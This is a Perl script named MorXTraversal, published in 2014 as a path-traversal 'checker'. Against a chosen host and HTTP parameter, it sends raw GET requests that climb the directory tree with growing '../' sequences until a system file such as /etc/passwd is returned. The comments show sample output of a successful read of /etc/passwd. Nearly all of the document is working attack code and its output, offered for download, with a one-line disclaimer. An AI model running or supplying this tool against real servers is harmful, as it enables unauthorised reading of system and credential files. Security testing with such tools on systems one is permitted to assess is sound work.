#!/usr/bin/perl
#
# Tool: MorXTraversal v1.0
# Author: Simo Ben youssef 
# Contact: <simo_at_morxploit_com>
# Coded: 1 July 2014
# Published: 4 August 2014
# MorXploit Research
# http://www.morxploit.com
#
# Download:
# http://www.morxploit.com/morxtools/morxtraversal.pl
#
# Description:
# Quick perl code to check for path traversal for a given HTTP parameter
# Currently supports one parameter at a time through GET method.
# Might add more features if I decide to release another version.
#
# Author discolaimer:
# This code and all information contained in this entire document is for educational, demonstration and testing purposes only.
# I cannot be held responsible for any malicious use. Use at your own risk.
# You can redistribute it and/or modify it under the same terms as Perl itself.
#
# root@MorXploit:/home/simo/morx# perl pt.pl localhost 'pt/index.php?f=' '/etc/passwd' root 10
# --- Directory traversal checker
# --- Coded By Simo Ben youssef / Simo@MorXploit.com
# --- MorXploit Research
# --- www.morxploit.com
#
# [*] Trying to exploit localhost ...
# [*] Press CTRL + c at anytime to abort
#
# [-] Path 1 failed, next ..
# [-] Path 2 failed, next ..
# [-] Path 3 failed, next ..
# [+] http://localhost/pt/index.php?f=../../../../etc/passwd success!

use strict;
use IO::Socket;

sub banner {
print "--- Path traversal checker\n";
print "--- Coded By Simo Ben youssef / Simo\@MorXploit.com\n";
print "--- MorXploit Research\n";
print "--- www.morxploit.com\n\n";
}

if(!defined($ARGV[0] && $ARGV[1] && $ARGV[2] && $ARGV[3] && $ARGV[4])) {
banner();
print "--- Usage:   perl $0 <host> <vulnerable+parameter> <targetfile> <string> <number of dirs> <additionalparameters>\n";
print "--- Example: perl $0 localhost 'index.php?file=' '/etc/passwd' root 10\n";
print "--- Example: perl $0 localhost 'index.php?file=' '/etc/passwd' root 10 '&p=value&p2=value2'\n\n";
exit; }

my $target = $ARGV[0];
my $port   = "80";
my $vulscript = $ARGV[1];
my $file = $ARGV[2];
my $string = $ARGV[3];
my $end = $ARGV[4];
my $additionalpara = $ARGV[5];
my $traverse = "..";
my $success;
my $pos = "1";

if (defined $additionalpara) {
$file = "$file$additionalpara";
}

my $h = "Host: $target";
my $ua = "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0";
my $connection = "Connection: close";

banner();
print "[*] Trying to exploit $target ...\n";
print "[*] Press CTRL + c at anytime to abort\n\n";

while ($pos <= $end) {
my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$target" ,PeerPort=>"$port"); die "[-] Can't creat socket: $!\n" unless $remote;
my $path = "$traverse$file";
my $get = "GET /$vulscript$path HTTP/1.1";
print $remote "$get\n$h\n$ua\n$connection\n\n";
my $output;
while ($output = <$remote>) {
if ($output =~ /$string/) {
$success = 1;
$remote->flush();
close($remote);
}
}

if ($success == 1) {
print "[+] http://$target/$vulscript$path success!\n\n";
exit;
}
else {
$traverse .= "/..";
$remote->flush();
close($remote);
}
print "[-] Path $pos failed, next ..\n";
$pos++
}
print "All failed for $file\n";
